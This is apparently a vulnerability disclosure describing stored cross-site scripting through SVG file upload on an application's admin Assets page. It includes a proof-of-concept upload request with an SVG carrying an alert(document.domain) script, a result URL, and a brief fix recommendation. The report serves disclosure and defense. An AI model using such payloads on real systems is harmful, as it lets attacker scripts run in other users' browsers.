Description

By uploading an SVG file containing JavaScript code in the file upload function on the administrator screen, it is possible to execute any script on the browser of the accessing user.

Proof of Concept

Log in to the administrator screen, access the Assets page, and upload the SVG file.

Request

POST /admin/asset/add HTTP/1.1
 ...
-----------------------------32482956685473744651320483298
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
-----------------------------32482956685473744651320483298
 ...

Execution Result

http://localhost/files/asset/d6dbbeb510abf7a3498c0b8dbdbb61738a91ab06.svg

PoC Video

https://drive.google.com/file/d/1egSGIfDD9ZTitGCb9-bLVZmPdMqUPPyK/view?usp=sharing

Measures

Always filter files, limit the content type of uploaded files, and properly sanitize content.